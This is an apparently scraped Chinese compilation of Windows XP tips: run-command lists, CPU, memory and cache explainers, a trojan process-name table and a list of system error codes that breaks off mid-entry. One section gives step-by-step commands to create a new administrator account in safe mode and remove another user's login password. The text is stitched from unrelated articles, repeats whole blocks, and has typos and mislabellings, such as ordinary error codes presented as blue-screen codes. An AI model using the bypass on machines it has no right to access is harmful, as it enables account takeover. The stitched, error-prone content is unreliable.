nslookup-------网络管理的工具向导 ntbackup-------系统备份和还原 narrator-------屏幕"讲述人" ntmsmgr.msc----移动存储管理器 ntmsoprq.msc---移动存储管理员操作请求 netstat -an----(TC)命令检查接口 syncapp--------创建一个公文包 sysedit--------系统配置编辑器 sigverif-------文件签名验证程序 sndrec32-------录音机 shrpubw--------创建共享文件夹 secpol.msc-----本地安全策略 syskey---------系统加密,一旦加密就不能解开,保护windows xp系统的双重密码 services.msc---本地服务设置 Sndvol32-------音量控制程序 sfc.exe--------系统文件检查器 sfc /scannow---windows文件保护 tsshutdn-------60秒倒计时关机命令 tourstart------xp简介(安装完成后出现的漫游xp程序) taskmgr--------任务管理器 eventvwr-------事件查看器 eudcedit-------造字程序 explorer-------打开资源管理器 packager-------对象包装程序 perfmon.msc----计算机性能监测程序 progman--------程序管理器 regedit.exe----注册表 rsop.msc-------组策略结果集 regedt32-------注册表编辑器 rononce -p ----15秒关机 regsvr32 /u *.dll----停止dll文件运行 regsvr32 /u zipfldr.dll------取消ZIP支持 cmd.exe--------CMD命令提示符 chkdsk.exe-----Chkdsk磁盘检查 certmgr.msc----证书管理实用程序 calc-----------启动计算器 charmap--------启动字符映射表 cliconfg-------SQL SERVER 客户端网络实用程序 Clipbrd--------剪贴板查看器 conf-----------启动netmeeting compmgmt.msc---计算机管理 cleanmgr-------**整理 ciadv.msc------索引服务程序 osk------------打开屏幕键盘 odbcad32-------ODBC数据源管理器 oobe/msoobe /a----检查XP是否激活 lusrmgr.msc----本机用户和组 logoff---------注销命令 iexpress-------木马捆绑工具,系统自带 Nslookup-------IP地址侦测器 fsmgmt.msc-----共享文件夹管理器 utilman--------辅助工具管理器 gpedit.msc-----组策略 防止死机二十四招
重装系统后6件必做大事
xp密码破解方法之一密码破解(适用初级学习者) >如用戶忘記登入密碼可按下列方法解決 >1. 在電腦啟動時按〔F8〕及選〔Safe Mode With Command Prompt〕 >2. 選 〔Administrator〕後便會跳出〔Command Prompt〕的窗口 >3. 用〔Net〕的命令增加一個用戶,例:增加一個用戶名為 alanhkg888,命令語法如下 >net user alanhkg888 /add >4. 將新增用戶提升至 Administrator 的權力,例:提升剛才增加用戶 alanhkg888 的權力,命令語法如下 >net localgroup administrators alanhkg888 /add >5. 完成上列步驟後重新啟動電腦,在啟動畫面上便增加了一個用戶 alanhkg888 了,選 alanhkg888 進入 >6. 登入後在〔控制台〕→〔使用者帳戶〕→選忘記密碼的用戶,然後選〔移除密碼〕後〔等出〕 >7. 在登入畫面中選原來的用戶便可不需密碼情況下等入 (因已移除了) >8. 刪除剛才新增的用戶,在〔控制台〕→〔使用者帳戶〕→選〔alanhkg888〕,然後選〔移除帳戶〕便可 >*不適用於忘記安裝時所設定〔administrator〕的密碼 Explorer.exe程序在系统中的作用 凡是Windows系列的操作系统,运行时都会启动一个名为Explorer.exe的进程。这个进程主要负责显示系统桌面上的图标以及任务栏,它在不同的系统中有不同的妙用。 Windows 9x中的应用 在Windows 9x中,这个进程是运行系统时所必需的。如果用“结束任务”的方法来结束Explorer.exe进程,系统就会刷新桌面,并更新注册表。所以,我们也可以利用此方法来快速更新注册表。方法如下: 按下Ctrl+Alt+Del组合键,出现“结束任务”对话框。在该对话框中选择“Explorer”选项,然后单击“结束任务”按钮,将出现“关闭Windows”对话框。单击“否”按钮,系统过一会儿将出现另一个对话框,告诉你该程序没有响应,询问是否结束任务。单击“结束任务”按钮,则更新注册表并返回Windows 9x系统环境中。这比起烦琐的重新启动过程要方便多了? Windows 2000/XP中的应用 在Windows 2000/XP和其他Windows NT内核的系统中,Explorer.exe进程并不是系统运行时所必需的,所以可以用任务管理器来结束它,并不影响系统的正常工作。打开你需要运行的程序,如记事本。然后右击任务栏,选择“任务管理器”,选中“进程”选项卡,在窗口中选择Explorer.exe进程,单击“结束进程”按钮,,接下来桌面上除了壁纸(活动桌面Active Desktop的壁纸除外),所有图标和任务栏都消失了。此时你仍可以像平常一样操作一切软件。 如果你想运行其他软件,但此时桌面上空无一物,怎么办?别着急,下面有两种可以巧妙地打开其他软件: 第一种方法:按下Ctrl+Alt+Del组合键,出现“Windows安全”对话框,单击“任务管理器”按钮(或是直接按下Ctrl+Shift+Esc组合键),在任务管理器窗口中选中“应用程序”选项卡,单击“新任务”,在弹出的“创建新任务”的对话框中,输入你想要打开的软件的路径和名称即可。 你还可以在正在运行的软件上,选择“文件→打开”,在“打开”对话框中,点击“文件类型”下拉列表,选择“所有文件”,再浏览到你想打开的软件,右击它,在快捷菜单中选择“打开”命令,就可以启动你需要的软件了。注意,此时不能够通过单击“打开”按钮来打开软件,此种方法适用于大多数软件,Office系列除外。 通过结束Explorer.exe进程,还可以减少4520KB左右的系统已使用内存,无疑会加快系统的运行速度,为资源紧张的用户腾出了宝贵的空间。 提示:重新启动Explorer.exe进程后,有些软件在任务栏系统托盘的小图标会消息,但该软件还是在正常运行当中。如果觉得有些不方便,可以再次打开该软件来显示小图标。 计算机基础知识CPU的实际工作频率是外频和倍频的乘积,外频好比马路的宽度,倍频好比在这条马路上单位时间允许通过的车辆数。目前主流CPU的外频通常为66、100或133,比如PentiumIII 667就是133外频乘以5倍频。一般来说,外频高的CPU性能要好一些,这就是为什么使用133外频的PIII667会与使用100外频的PIII700不相上下的原因。所以在选择CPU的时候除了要看总频率,还要注意频率的构成。
CPU的频率 凡是懂得点电脑的朋友,都应该对‘频率’两个字熟悉透了吧!作为机器的核心CPU的频率当然是非常重 要的,因为它能直接影响机器的性能。那么,您是否对CPU频率方面的问题了解得很透彻呢?请随我来,让我给您详细说说吧! 所谓主频,也就是CPU正常工作时的时钟频率,从理论上讲CPU的主频越高,它的速度也就越快,因为频率 越高,单位时钟周期内完成的指令就越多,从而速度也就越快了。但是由于各种CPU内部结构的差异 (如缓存、指令集),并不是时钟频率相同速度就相同,比如PIII和赛扬,雷鸟和DURON,赛扬和DURON,PIII与雷鸟,在相同主频下性能都不同程度的存在着差异。目前主流CPU的主频都在600MHz以上,而频率 最高(注意,并非最快)的P4已经达到1.7GHz,AMD的雷鸟也已经达到了1.3GHz,而且还会不断提升。 在486出现以后,由于CPU工作频率不断提高,而PC机的一些其他设备(如插卡、硬盘等)却受到工 艺的限制,不能承受更高的频率,因此限制了CPU频率的进一步提高。因此,出现了倍频技术,该技术能 够使CPU内部工作频率变为外部频率的倍数,从而通过提升倍频而达到提升主频的目的。因此在486以后我们接触到两个新的概念--外频与倍频。它们与主频之间的关系是外频X倍频=主频。一颗CPU的外频与今天我们常说的FSB(Front side bus,前端总线)频率是相同的(注意,是频率相同),目前市场上的CPU的外频主要有66MHz(赛扬系列)、100MHz(部分PIII和部分雷鸟以及所有P4和DURON)、133MHz(部 分PIII和部分雷鸟)。值得一提的是,目前有些媒体宣传一些CPU的外频达到了200MHz(DURON)、266MHz(雷鸟)甚至400MHz(P4),实际上是把外频与前端总线混为一谈了,其实它们的外频仍然是100MHz和133MHz,但是由于采用了特殊的技术,使前端总线能够在一个时钟周期内完成2次甚至4次传输,因此相当于将前端总线频率提升了好几倍。不过从外频与倍频的定义来看,它们的外频并未因此而发生改变,希望大家注意这一点。今天外频并未比当初提升多少,但是倍频技术今天已经发展到一个很高的阶段 。以往的倍频都只能达到2-3倍,而现在的P4、雷鸟都已经达到了10倍以上,真不知道以后还会不会更高。眼下的CPU倍频一般都已经在出厂前被锁定(除了部分工程样品),而外频则未上锁。部分CPU如AMD的,DURON和雷鸟能够通过特殊手段对其倍频进行解锁,而INTEL产CPU则不行。 由于外频不断提高,渐渐地提高到其他设备无法承受了,因此出现了分频技术(其实这是主板北桥芯 片的功能)。分频技术就是通过主板的北桥芯片将CPU外频降低,然后再提供给各插卡、硬盘等设备。早 期的66MHz外频时代是PCI设备2分频,AGP设备不分频;后来的100MHz外频时代则是PCI设备3分频,AGP设 备2/3分频(有些100MHz的北桥芯片也支持PCI设备4分频);目前的北桥芯片一般都支持133MHz外频,即 PCI设备4分频、AGP设备2分频。总之,在标准外频(66MHz、100MHz、133MHz)下北桥芯片必须使PCI设备 工作在33MHz,AGP设备工作在66MHz,才能说该芯片能正式支持该种外频。 最后再来谈谈CPU的超频。CPU超频其实就是通过提高外频或者倍频的手段来提高CPU主频从而提升整 个系统的性能。超频的历史已经很久远(其实也就几年),但是真正为大家所喜爱则是从赛扬系列的出产 而开始的,其中赛扬300A超450、366超550直到今天还为人们所津津乐道。而它们就是通过将赛扬CPU的 66MHz外频提升到100MHz从而提升了CPU的主频。而早期的DURON超频则与赛扬不同,它是通过破解倍频锁 然后提升倍频的方式来提高频率。总的看来,超倍频比超外频更稳定,因为超倍频没有改变外频,也就 不会影响到其他设备的正常运作;但是如果超外频,就可能遇到非标准外频如75MHz、83MHz、112MHz等, 这些情况下由于分频技术的限制,致使其他设备都不能工作在正常的频率下,从而可能造成系统的不稳定 ,甚至出现硬盘数据丢失、严重的可能损坏。因此,笔者在这里告诫大家:超频虽有好处,但是也十分危 险,所以请大家慎重超频! 内存就是随机存贮器(Random Access Memory,简称为RAM)。RAM分成两大类:静态随机存储器,即Static RAM(SRAM)和动态随机存储器,Dynamic RAM(DRAM),我们经常说的“系统内存”就是指后者,DRAM。 SRAM是一种重要的内存,它的用途广泛,被应用在各个领域。SRAM的速度非常快,在快速读取和刷新时可以保持数据完整性,即保持数据不丢失。SRAM内部采用的是双稳态电路的形式来存储数据,为了实现这种结构,SRAM的电路结构非常复杂,往往要采用大量的晶体管来构造寄存器以保留数据。采用大量的晶体管就需要大量的硅,因此就增加了芯片的面积,无形中增加了制造成本。制造相同容量的SRAM比DRAM的成本贵许多,因此,SRAM在PC平台上就只能用于CPU内部的一级缓存以及内置的二级缓存。而我们所说的“系统内存”使用的应该是DRAM。由于SRAM的成本昂贵,其发展受到了严重的限制,目前仅有少量的网络服务器以及路由器上使用了SRAM。 DRAM的应用比SRAM要广泛多了。DRAM的结构较SRAM要简单许多,它的内部仅仅由一个MOS管和一个电容组成,因此,无论是集成度、生产成本以及体积,DRAM都比SRAM具有优势。目前,随着PC机的不断发展,我们对于系统内存的要求越来越大,随着WindowXP的推出,软件对于内存的依赖更加明显:在WindowsXP中,专业版至少需要180MB内存以上,而在实际使用中,128MB才能保证系统正常运行。因此,随着PC的发展,内存的容量将不断扩大,速度也会不断提升。 好了,下面我们在来说一下内存的速度问题。我们选择内存的速度,决定于你选用CPU的前端总线,例如你用的是Pentium 4A那你用双通道的DDR200或者DDR400就已经足够了~因为P4A的前端总线是400MHz,但是由于内存厂商的市场策略问题,DDR200基本就没有出货。取而代之的是DDR266能够提供2.1GB的带宽,此种内存适用于Athlon XP低频、毒龙以及533MHz FSB Pentium 4B等半过时产品(需搭配双通道),已经不在主流市场之内。 DDR333能够提供2.7GB的内存带宽适用于AMD 166MHz外频的Barton处理器。而双通道的DDR400内存以及DDR433 DDR450内存将能够提供6.4GB以上的内存带宽,主要应用在Intel高端的Pentium 4C、Pentium 4E(Prescott核心)以及Athlon 64上面。当然,上文所述的仅仅是能够满足硬件系统的最低要求,如果您拥有一颗像毒龙1.6GHz、Athlon XP 1800+(b0 1.5V低压版)、Pentium 4 1.8A、AthlonXP 2000+Pentium 4 2.4C以及Barton 2500+这样具有极品超频潜力的CPU那么我推荐您购买高档次的内存,例如Athlon 2000+配合DDR333的内存,这样基本所有的Barton 2000+都可以超到2500+使用,市场上的假2500+就是用2000+超频而来的。 在Windows XP系统的实际应用中,我们提出一个不规范的公式 内存容量〉内存速度〉内存类型。也就是说就算是256M的SDRAM也要比128M的DDR400系统速度快,在选购内存的时候,我们建议XP系统应该配备384M以上的内存,才能保证系统的快速运行。 文章来自于【学吧】http://www.xue8.com/article/ViewArticle.asp?ArticleID=673 CPU缓存(Cache Memory)是位于CPU与内存之间的临时存储器,它的容量比内存小的多但是交换速度却比内存要快得多。缓存的出现主要是为了解决CPU运算速度与内存读写速度不匹配的矛盾,因为CPU运算速度要比内存读写速度快很多,这样会使CPU花费很长时间等待数据到来或把数据写入内存。在缓存中的数据是内存中的一小部分,但这一小部分是短时间内CPU即将访问的,当CPU调用大量数据时,就可避开内存直接从缓存中调用,从而加快读取速度。由此可见,在CPU中加入缓存是一种高效的解决方案,这样整个内存储器(缓存+内存)就变成了既有缓存的高速度,又有内存的大容量的存储系统了。缓存对CPU的性能影响很大,主要是因为CPU的数据交换顺序和CPU与缓存间的带宽引起的。 缓存的工作原理是当CPU要读取一个数据时,首先从缓存中查找,如果找到就立即读取并送给CPU处理;如果没有找到,就用相对慢的速度从内存中读取并送给CPU处理,同时把这个数据所在的数据块调入缓存中,可以使得以后对整块数据的读取都从缓存中进行,不必再调用内存。 正是这样的读取机制使CPU读取缓存的命中率非常高(大多数CPU可达90%左右),也就是说CPU下一次要读取的数据90%都在缓存中,只有大约10%需要从内存读取。这大大节省了CPU直接读取内存的时间,也使CPU读取数据时基本无需等待。总的来说,CPU读取数据的顺序是先缓存后内存。 目前缓存基本上都是采用SRAM存储器,SRAM是英文Static RAM的缩写,它是一种具有静志存取功能的存储器,不需要刷新电路即能保存它内部存储的数据。不像DRAM内存那样需要刷新电路,每隔一段时间,固定要对DRAM刷新充电一次,否则内部的数据即会消失,因此SRAM具有较高的性能,但是SRAM也有它的缺点,即它的集成度较低,相同容量的DRAM内存可以设计为较小的体积,但是SRAM却需要很大的体积,这也是目前不能将缓存容量做得太大的重要原因。它的特点归纳如下:优点是节能、速度快、不必配合内存刷新电路、可提高整体的工作效率,缺点是集成度低、相同的容量体积较大、而且价格较高,只能少量用于关键性系统以提高效率。 按照数据读取顺序和与CPU结合的紧密程度,CPU缓存可以分为一级缓存,二级缓存,部分高端CPU还具有三级缓存,每一级缓存中所储存的全部数据都是下一级缓存的一部分,这三种缓存的技术难度和制造成本是相对递减的,所以其容量也是相对递增的。当CPU要读取一个数据时,首先从一级缓存中查找,如果没有找到再从二级缓存中查找,如果还是没有就从三级缓存或内存中查找。一般来说,每级缓存的命中率大概都在80%左右,也就是说全部数据量的80%都可以在一级缓存中找到,只剩下20%的总数据量才需要从二级缓存、三级缓存或内存中读取,由此可见一级缓存是整个CPU缓存架构中最为重要的部分。 一级缓存(Level 1 Cache)简称L1 Cache,位于CPU内核的旁边,是与CPU结合最为紧密的CPU缓存,也是历史上最早出现的CPU缓存。由于一级缓存的技术难度和制造成本最高,提高容量所带来的技术难度增加和成本增加非常大,所带来的性能提升却不明显,性价比很低,而且现有的一级缓存的命中率已经很高,所以一级缓存是所有缓存中容量最小的,比二级缓存要小得多。 一般来说,一级缓存可以分为一级数据缓存(Data Cache,D-Cache)和一级指令缓存(Instruction Cache,I-Cache)。二者分别用来存放数据以及对执行这些数据的指令进行即时解码,而且两者可以同时被CPU访问,减少了争用Cache所造成的冲突,提高了处理器效能。目前大多数CPU的一级数据缓存和一级指令缓存具有相同的容量,例如AMD的Athlon XP就具有64KB的一级数据缓存和64KB的一级指令缓存,其一级缓存就以64KB+64KB来表示,其余的CPU的一级缓存表示方法以此类推。 Intel的采用NetBurst架构的CPU(最典型的就是Pentium 4)的一级缓存有点特殊,使用了新增加的一种一级追踪缓存(Execution Trace Cache,T-Cache或ETC)来替代一级指令缓存,容量为12KμOps,表示能存储12K条即12000条解码后的微指令。一级追踪缓存与一级指令缓存的运行机制是不相同的,一级指令缓存只是对指令作即时的解码而并不会储存这些指令,而一级追踪缓存同样会将一些指令作解码,这些指令称为微指令(micro-ops),而这些微指令能储存在一级追踪缓存之内,无需每一次都作出解码的程序,因此一级追踪缓存能有效地增加在高工作频率下对指令的解码能力,而μOps就是micro-ops,也就是微型操作的意思。它以很高的速度将μops提供给处理器核心。Intel NetBurst微型架构使用执行跟踪缓存,将解码器从执行循环中分离出来。这个跟踪缓存以很高的带宽将uops提供给核心,从本质上适于充分利用软件中的指令级并行机制。Intel并没有公布一级追踪缓存的实际容量,只知道一级追踪缓存能储存12000条微指令(micro-ops)。所以,我们不能简单地用微指令的数目来比较指令缓存的大小。实际上,单核心的NetBurst架构CPU使用8Kμops的缓存已经基本上够用了,多出的4kμops可以大大提高缓存命中率。而如果要使用超线程技术的话,12KμOps就会有些不够用,这就是为什么有时候Intel处理器在使用超线程技术时会导致性能下降的重要原因。 例如Northwood核心的一级缓存为8KB+12KμOps,就表示其一级数据缓存为8KB,一级追踪缓存为12KμOps;而Prescott核心的一级缓存为16KB+12KμOps,就表示其一级数据缓存为16KB,一级追踪缓存为12KμOps。在这里12KμOps绝对不等于12KB,单位都不同,一个是μOps,一个是Byte(字节),而且二者的运行机制完全不同。所以那些把Intel的CPU一级缓存简单相加,例如把Northwood核心说成是20KB一级缓存,把Prescott核心说成是28KB一级缓存,并且据此认为Intel处理器的一级缓存容量远远低于AMD处理器128KB的一级缓存容量的看法是完全错误的,二者不具有可比性。在架构有一定区别的CPU对比中,很多缓存已经难以找到对应的东西,即使类似名称的缓存在设计思路和功能定义上也有区别了,此时不能用简单的算术加法来进行对比;而在架构极为近似的CPU对比中,分别对比各种功能缓存大小才有一定的意义。 常见病毒、木马进程速查表 常见病毒、木马进程速查表 本文含概了windows几乎所有常见的病毒、木马的进程名程,检查你的系统进程,看看是否中招。 exe → BF Evolution Mbbmanager.exe → 聪明基因 _.exe → Tryit Mdm.exe → Doly 1.6-1.7 Aboutagirl.exe → 初恋情人 Microsoft.exe → 传奇密码使者 Absr.exe → Backdoor.Autoupder Mmc.exe → 尼姆达病毒 Aplica32.exe → 将死者病毒 Mprdll.exe → Bla Avconsol.exe → 将死者病毒 Msabel32.exe → Cain and Abel Avp.exe → 将死者病毒 Msblast.exe → 冲击波病毒 Avp32.exe → 将死者病毒 Mschv.exe → Control Avpcc.exe → 将死者病毒 Msgsrv36.exe → Coma Avpm.exe → 将死者病毒 Msgsvc.exe → 火凤凰 Avserve.exe → 震荡波病毒 Msgsvr16.exe → Acid Shiver Bbeagle.exe → 恶鹰蠕虫病毒 Msie5.exe → Canasson Brainspy.exe → BrainSpy vBeta Msstart.exe → Backdoor.livup Cfiadmin.exe → 将死者病毒 Mstesk.exe → Doly 1.1-1.5 Cfiaudit.exe → 将死者病毒 Netip.exe → Spirit 2000 Beta Cfinet32.exe → 将死者病毒 Netspy.exe → 网络精灵 Checkdll.exe → 网络公牛 Notpa.exe → Backdoor Cmctl32.exe → Back Construction Odbc.exe → Telecommando Command.exe → AOL Trojan Pcfwallicon.exe → 将死者病毒 Diagcfg.exe → 广外女生 Pcx.exe → Xplorer Dkbdll.exe → Der Spaeher Pw32.exe → 将死者病毒 Dllclient.exe → Bobo Recycle - Bin.exe → s**tHeap Dvldr32.exe → 口令病毒 Regscan.exe → 波特后门变种 Esafe.exe → 将死者病毒 Tftp.exe → 尼姆达病毒 Expiorer.exe → Acid Battery Thing.exe → Thing Feweb.exe → 将死者病毒 User.exe → Schwindler Flcss.exe → Funlove病毒 Vp32.exe → 将死者病毒 Frw.exe → 将死者病毒 Vpcc.exe → 将死者病毒 Icload95.exe → 将死者病毒 Vpm.exe → 将死者病毒 Icloadnt.exe → 将死者病毒 Vsecomr.exe → 将死者病毒 Icmon.exe → 将死者病毒 Server.exe → Revenger, WinCrash, YAT Icsupp95.exe → 将死者病毒 Service.exe → Trinoo Iexplore.exe → 恶邮差病毒 Setup.exe → 密码病毒或Xanadu Rpcsrv.exe → 恶邮差病毒 Sockets.exe → Vampire Rundll.exe → SCKISS爱情森林 Something.exe → BladeRunner Rundll32.exe→ 狩猎者病毒 Spfw.exe → 瑞波变种PX Runouce.exe → 中国黑客病毒 Svchost.exe (线程105) → 蓝色代码 Scanrew.exe → 传奇终结者 Sysedit32.exe → SCKISS爱情森林 Scvhost.exe → 安哥病毒 Sy***plor.exe → wCrat Server 1. 2.exe → Spirit 2000 1.2fixed Sy***plr.exe → 冰河 Intel.exe → 传奇叛逆 Syshelp.exe → 恶邮差病毒 Internet.exe → 传奇幽灵 Sysprot.exe → Satans Back Door Internet.exe → 网络神偷 Sysrunt.exe → Ripper Kernel16.exe → Transmission Scount System.exe → s**tHeap Kernel32.exe → 坏透了或冰河 System32.exe → DeepThroat 1.0 Kiss.exe → 传奇天使 Systray.exe → DeepThroat 2.0-3.1 Krn132.exe → 求职信病毒 Syswindow.exe → Trojan Cow Libupdate.exe → BioNet Task_Bar.exe → WebEx Load.exe → 尼姆达病毒 Taskbar → 密码病毒 Frethem Lockdown2000.exe → 将死者病毒 Taskmon.exe → 诺维格蠕虫病毒 Taskmon32 → 传奇黑眼睛 Tds2-98.exe → 将死者病毒 Tds2-Nt.exe → 将死者病毒 Temp $01.exe → Snid Tempinetb00st.exe → The Unexplained Tempserver.exe → Delta Source Vshwin32.exe → 将死者病毒 Vsstart.exe → 将死者病毒 Vw32.exe → 将死者病毒 Windown.exe → Spirit 2000 1.2 Windows.exe → 黑洞2000 Winfunctions.exe → Dark Shadow Wingate.exe → 恶邮差病毒 Wink????.exe → 求职信病毒 Winl0g0n.exe → 笑哈哈病毒 Winmgm32.exe → 巨无霸病毒 Winmsg32.exe → Xtcp Winprot.exe → Chupachbra Winprotecte.exe → Stealth Winrpc.exe → 恶邮差病毒 Winrpcsrv.exe → 恶邮差病毒 Winserv.exe → Softwarst Wubsys.exe → 传奇猎手 Winupdate.exe → Sckiss爱情森林 Winver.exe → Sckiss爱情森林 Winvnc.exe → 恶邮差病毒 Winzip.exe → ShadowPhyre Wqk.exe → 求职信病毒 常见病毒、木马进程速查表 exe → BF Evolution Mbbmanager.exe → 聪明基因 _.exe → Tryit Mdm.exe → Doly 1.6-1.7 Aboutagirl.exe → 初恋情人 Microsoft.exe → 传奇密码使者 Absr.exe → Backdoor.Autoupder Mmc.exe → 尼姆达病毒 Aplica32.exe → 将死者病毒 Mprdll.exe → Bla Avconsol.exe → 将死者病毒 Msabel32.exe → Cain and Abel Avp.exe → 将死者病毒 Msblast.exe → 冲击波病毒 Avp32.exe → 将死者病毒 Mschv.exe → Control Avpcc.exe → 将死者病毒 Msgsrv36.exe → Coma Avpm.exe → 将死者病毒 Msgsvc.exe → 火凤凰 Avserve.exe → 震荡波病毒 Msgsvr16.exe → Acid Shiver Bbeagle.exe → 恶鹰蠕虫病毒 Msie5.exe → Canasson Brainspy.exe → BrainSpy vBeta Msstart.exe → Backdoor.livup Cfiadmin.exe → 将死者病毒 Mstesk.exe → Doly 1.1-1.5 Cfiaudit.exe → 将死者病毒 Netip.exe → Spirit 2000 Beta Cfinet32.exe → 将死者病毒 Netspy.exe → 网络精灵 Checkdll.exe → 网络公牛 Notpa.exe → Backdoor Cmctl32.exe → Back Construction Odbc.exe → Telecommando Command.exe → AOL Trojan Pcfwallicon.exe → 将死者病毒 Diagcfg.exe → 广外女生 Pcx.exe → Xplorer Dkbdll.exe → Der Spaeher Pw32.exe → 将死者病毒 Dllclient.exe → Bobo Recycle - Bin.exe → s**tHeap Dvldr32.exe → 口令病毒 Regscan.exe → 波特后门变种 Esafe.exe → 将死者病毒 Tftp.exe → 尼姆达病毒 Expiorer.exe → Acid Battery Thing.exe → Thing Feweb.exe → 将死者病毒 User.exe → Schwindler Flcss.exe → Funlove病毒 Vp32.exe → 将死者病毒 Frw.exe → 将死者病毒 Vpcc.exe → 将死者病毒 Icload95.exe → 将死者病毒 Vpm.exe → 将死者病毒 Icloadnt.exe → 将死者病毒 Vsecomr.exe → 将死者病毒 Icmon.exe → 将死者病毒 Server.exe → Revenger, WinCrash, YAT Icsupp95.exe → 将死者病毒 Service.exe → Trinoo Iexplore.exe → 恶邮差病毒 Setup.exe → 密码病毒或Xanadu Rpcsrv.exe → 恶邮差病毒 Sockets.exe → Vampire Rundll.exe → SCKISS爱情森林 Something.exe → BladeRunner Rundll32.exe→ 狩猎者病毒 Spfw.exe → 瑞波变种PX Runouce.exe → 中国黑客病毒 Svchost.exe (线程105) → 蓝色代码 Scanrew.exe → 传奇终结者 Sysedit32.exe → SCKISS爱情森林 Scvhost.exe → 安哥病毒 Sy***plor.exe → wCrat Server 1. 2.exe → Spirit 2000 1.2fixed Sy***plr.exe → 冰河 Intel.exe → 传奇叛逆 Syshelp.exe → 恶邮差病毒 Internet.exe → WINDOWS的蓝屏代码信息WINDOWS的蓝屏代码信息
-------------------------------------------------------------------------------- 0 0x0000 作业完成。 1 0x0001 不正确的函数。 2 0x0002 系统找不到指定的档案。 3 0x0003 系统找不到指定的路径。 4 0x0004 系统无法开启档案。 5 0x0005 拒绝存取。 6 0x0006 无效的代码。 7 0x0007 储存体控制区块已毁。 8 0x0008 储存体空间不足,无法处理这个指令。 9 0x0009 储存体控制区块地址无效。 10 0x000A 环境不正确。 11 0x000B 尝试加载一个格式错误的程序。 12 0x000C 存取码错误。 13 0x000D 资料错误。 14 0x000E 储存体空间不够,无法完成这项作业。 15 0x000F 系统找不到指定的磁盘驱动器。 16 0x0010 无法移除目录。 16 0x0010 无法移除目录。 17 0x0011 系统无法将档案移到 其它的磁盘驱动器。 18 0x0012 没有任何档案。 19 0x0013 储存媒体为写保护状态。 20 0x0014 系统找不到指定的装置。 21 0x0015 装置尚未就绪。 22 0x0016 装置无法识别指令。 23 0x0017 资料错误 (cyclic redundancy check) 24 0x0018 程序发出一个长度错误的指令。 25 0x0019 磁盘驱动器在磁盘找不到 持定的扇区或磁道。 26 0x001A 指定的磁盘或磁盘无法存取。 27 0x001B 磁盘驱动器找不到要求的扇区。 28 0x001C 打印机没有纸。 29 0x001D 系统无法将资料写入指定的磁盘驱动器。 30 0x001E 系统无法读取指定的装置。 31 0x001F 连接到系统的某个装置没有作用。 32 0x0020 The process cannot access the file because it is being used by another process. 33 0x0021 档案的一部份被锁定, 现在无法存取。 34 0x0022 磁盘驱动器的磁盘不正确。 请将 %2 (Volume Serial Number: %3) 插入磁盘机%1。 36 0x0024 开启的分享档案数量太多。 38 0x0026 到达档案结尾。 39 0x0027 磁盘已满。 50 0x0032 不支持这种网络要求。 51 0x0033 远程计算机无法使用。 52 0x0034 网络名称重复。 53 0x0035 网络路径找不到。 54 0x0036 网络忙碌中。 55 0x0037 The specified network resource or device is no longer available. 56 0x0038 The network BIOS command limit has been reached. 57 0x0039 网络配接卡发生问题。 58 0x003A 指定的服务器无法执行要求的作业。 59 0x003B 网络发生意外错误。 60 0x003C 远程配接卡不兼容。 61 0x003D 打印机队列已满。 62 0x003E 服务器的空间无法储存等候打印的档案。 63 0x003F 等候打印的档案已经删除。 64 0x0040 指定的网络名称无法使用。 65 0x0041 拒绝存取网络。 65 0x0041 拒绝存取网络。 66 0x0042 网络资源类型错误。 67 0x0043 网络名称找不到。 68 0x0044 超过区域计算机网络配接卡的名称限制。 69 0x0045 超过网络 BIOS 作业阶段的限制。 70 0x0046 远程服务器已经暂停或者正在起始中。 71 0x0047 由于联机数目已达上限,此时无法再联机到这台远程计算机。 72 0x0048 指定的打印机或磁盘装置已经暂停作用。 80 0x0050 档案已经存在。 82 0x0052 无法建立目录或档案。 83 0x0053 INT 24 失败 84 0x0054 处理这项要求的储存体无法使用。 85 0x0055 近端装置名称已经在使用中。 86 0x0056 指定的网络密码错误。 87 0x0057 参数错误。 88 0x0058 网络发生资料写入错误。 89 0x0059 此时系统无法执行其它行程。 100 0x0064 无法建立其它的系统 semaphore。 101 0x0065 属于其它行程专用的 semaphore. 102 0x0066 semaphore 已经设定,而且无法关闭。 103 0x0067 无法指定 semaphore 。 104 0x0068 在岔断时间无法要求专用的 semaphore 。 104 0x0068 在岔断时间无法要求专用的 semaphore 。 105 0x0069 此 semaphore 先前的拥有权已经结束。 106 0x006A 请将磁盘插入 %1。 107 0x006B 因为代用的磁盘尚未插入,所以程序已经停止。 108 0x006C 磁盘正在使用中或被锁定。 109 0x006D Pipe 已经中止。 110 0x006E 系统无法开启指定的 装置或档案。 111 0x006F 档名太长。 112 0x0070 磁盘空间不足。 113 0x0071 没有可用的内部档案标识符。 114 0x0072 目标内部档案标识符不正确。 117 0x0075 由应用程序所执行的 IOCTL 呼叫 不正确。 118 0x0076 写入验证参数值不正确。 119 0x0077 系统不支持所要求的指令。 120 0x0078 此项功能仅在 Win32 模式有效。 121 0x0079 semaphore 超过逾时期间。 122 0x007A 传到系统呼叫的资料区域 太小。 123 0x007B 文件名、目录名称或储存体卷标语法错误。 124 0x007C 系统呼叫层次不正确。 125 0x007D 磁盘没有设定卷标。 126 0x007E 找不到指定的模块。 127 0x007F 找不到指定的程序。 128 0x0080 没有子行程可供等待。 128 0x0080 没有子行程可供等待。 129 0x0081 %1 这个应用程序无法在 Win32 模式下执行。 130 0x0082 Attempt to use a file handle to an open disk partition for an operation other than raw disk I/O. 131 0x0083 尝试将档案指针移至档案开头之前。 132 0x0084 无法在指定的装置或档案,设定档案指针。 133 0x0085 JOIN 或 SUBST 指令 无法用于 内含事先结合过的磁盘驱动器。 134 0x0086 尝试在已经结合的磁盘驱动器,使用 JOIN 或 SUBST 指令。 135 0x0087 尝试在已经替换的磁盘驱动器,使 用 JOIN 或 SUBST 指令。 136 0x0088 系统尝试删除 未连结过的磁盘驱动器的连结关系。 137 0x0089 系统尝试删除 未替换过的磁盘驱动器的替换关系。 138 0x008A 系统尝试将磁盘驱动器结合到已经结合过之磁盘驱动器的目录。 139 0x008B 系统尝试将磁盘驱动器替换成已经替换过之磁盘驱动器的目录。 140 0x008C 系统尝试将磁盘驱动器替换成已经替换过之磁盘驱动器的目录。 141 0x00 系统尝试将磁盘驱动器 SUBST 成已结合的磁盘驱动器 目录。 142 0x008E 系统此刻无法执行 JOIN 或 SUBST。 143 0x008F 系统无法将磁盘驱动器结合或替换同一磁盘驱动器下目录。 144 0x0090 这个目录不是根目录的子目录。 145 0x0091 目录仍有资料。 146 0x0092 指定的路径已经被替换过。 147 0x0093 资源不足,无法处理这项 指令。 148 0x0094 指定的路径这时候无法使用。 148 0x0094 指定的路径这时候无法使用。 149 0x0095 